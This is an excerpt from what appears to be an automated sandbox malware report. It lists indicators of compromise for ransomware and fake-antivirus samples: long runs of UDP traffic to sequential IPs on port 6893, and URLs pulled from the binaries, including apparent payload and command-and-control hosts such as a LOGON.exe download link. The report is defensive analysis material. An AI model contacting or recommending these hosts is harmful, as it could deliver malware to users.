          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.155:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.156:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.157:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.158:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.159:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.160:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.161:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.162:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.163:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.164:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.165:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.166:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.167:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.168:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.169:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.170:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.171:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.172:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.173:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.174:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.175:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.176:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.177:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.178:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.179:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.180:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.181:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.182:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.183:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.184:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.185:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.186:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.187:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.188:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.189:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.190:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.191:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.192:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.193:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.194:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.195:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.196:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.197:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.198:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.199:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.200:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.201:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.202:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.203:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.204:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.205:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.206:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.207:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.208:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.209:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.210:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.211:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.212:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.213:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.214:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.215:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.216:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.217:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.218:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.219:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.220:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.221:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.222:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.223:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.224:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.225:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.226:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.227:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.228:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.229:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.230:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.231:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.232:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.233:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.234:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.235:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.236:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.237:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.238:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.239:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.240:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.241:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.242:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.243:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.244:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.245:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.246:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.247:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.248:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.249:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.250:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.251:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.252:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.253:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.254:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.176.255:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.0:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.1:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.2:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.3:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.4:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.5:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.6:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.7:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.8:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.9:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.10:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.11:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.12:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.13:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.14:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.15:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.16:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.17:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.18:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.19:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.20:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.21:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.22:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.23:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.24:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.25:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.26:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.27:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.28:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.29:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.30:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.31:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.32:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.33:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.34:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.35:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.36:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.37:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.38:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.39:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.40:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.41:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.42:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.43:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.44:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.45:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.46:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.47:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.48:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.49:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.50:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.51:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.52:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.53:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.54:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.55:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.56:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.57:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.58:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.59:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.60:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.61:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.62:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.63:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.64:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.65:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.66:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.67:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.68:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.69:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.70:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.71:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.72:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.73:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.74:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.75:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.76:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.77:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.78:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.79:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.80:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.81:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.82:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.83:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.84:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.85:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.86:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.87:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.88:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.89:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.90:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.91:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.92:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.93:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.94:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.95:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.96:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.97:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.98:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.99:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.100:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.101:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.103:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.102:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.104:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.106:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.105:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.107:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.108:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.109:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.110:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.111:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.112:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.113:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.114:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.115:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.116:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.117:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.118:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.119:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.120:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.121:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.122:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.123:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.124:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.125:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.126:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.127:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.128:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.129:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.130:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.131:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.132:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.133:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.134:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.135:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.136:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.137:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.138:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.140:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.139:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.141:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.142:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.143:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.144:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.145:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.146:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.147:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.148:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.149:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.150:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.151:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.152:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.153:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.154:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.155:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.156:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.157:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.158:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.159:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.160:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.161:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.162:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.163:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.164:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.165:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.166:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.167:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.168:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.169:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.170:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.171:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.172:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.173:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.174:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.175:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.176:6893
          Source: global trafficUDP traffic: 192.168.2.5:55040 -> 87.98.177.177:6893
          Source: rundll32.exe, 0000000F.00000002.574376320.0000000004FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/
          Source: rundll32.exe, 0000000F.00000002.567500892.000000000348E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/4fY
          Source: rundll32.exe, 0000000F.00000002.567500892.000000000348E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/8fE
          Source: avpc2009.exe, 00000019.00000000.490943121.0000000000516000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: http://antiviruspc-update.com:8080/
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.blo
          Source: Endermanch@DeriaLock.exe, 00000016.00000000.479761839.0000000000D56000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/
          Source: Endermanch@DeriaLock.exe, 00000016.00000000.479761839.0000000000D56000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/LOGON.exe
          Source: Endermanch@DeriaLock.exe, 00000016.00000000.479761839.0000000000D56000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/unlock-everybody.txt
          Source: Endermanch@Cerber5.exe, 00000010.00000002.603863031.0000000005496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://btc.blo
          Source: avpc2009.exe, 00000019.00000000.490943121.0000000000516000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: http://bugs.clamav.net
          Source: Endermanch@Antivirus.exe, 00000004.00000000.431489950.00000000004AE000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://checkeds.com/customers/installer.php?pid=AVT_BASIC
          Source: rundll32.exe, 0000000F.00000002.554445419.000000000343C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.511029436.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.488118992.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.471920042.000000000343D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
          Source: rundll32.exe, 0000000F.00000002.554445419.000000000343C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.511029436.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.486809681.0000000004F21000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.488118992.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.471920042.000000000343D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://diskcryptor.net/
          Source: Endermanch@AnViPC2009.exe, 00000008.00000003.468576995.0000000004524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gnuwin32.sourceforge.net
          Source: avpc2009.exe, 00000019.00000000.490943121.0000000000516000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: http://google.ru/
          Source: avpc2009.exe, 00000019.00000003.593999186.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9
          Source: avpc2009.exe, 00000019.00000003.691897760.0000000003A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb91b
          Source: avpc2009.exe, 00000019.00000003.575274616.0000000003AD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9C
          Source: avpc2009.exe, 00000019.00000003.691897760.0000000003A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9Sx
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.638559464.0000000003AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9TSH
          Source: avpc2009.exe, 00000019.00000003.593999186.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9cb
          Source: avpc2009.exe, 00000019.00000003.691897760.0000000003A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9d3
          Source: avpc2009.exe, 00000019.00000003.691897760.0000000003A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9d3j
          Source: avpc2009.exe, 00000019.00000003.575274616.0000000003AD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9dN
          Source: avpc2009.exe, 00000019.00000003.593999186.0000000003ADC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9h
          Source: avpc2009.exe, 00000019.00000003.638559464.0000000003AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9s
          Source: avpc2009.exe, 00000019.00000003.609542818.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 00000019.00000003.638559464.0000000003AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9sT
          Source: avpc2009.exe, 00000019.00000003.638559464.0000000003AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9x
          Source: avpc2009.exe, 00000019.00000003.638559464.0000000003AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.ru/2665d2e9-101f-4a69-9ea9-9e5d49d37eb9y2
          Source: Endermanch@AntivirusPro2017.exe, 00000006.00000003.696813300.0000000002923000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://licencecheck24.com/checking.php
          Source: rundll32.exe, 0000000F.00000002.554445419.000000000343C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.511029436.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.488118992.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.471920042.000000000343D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
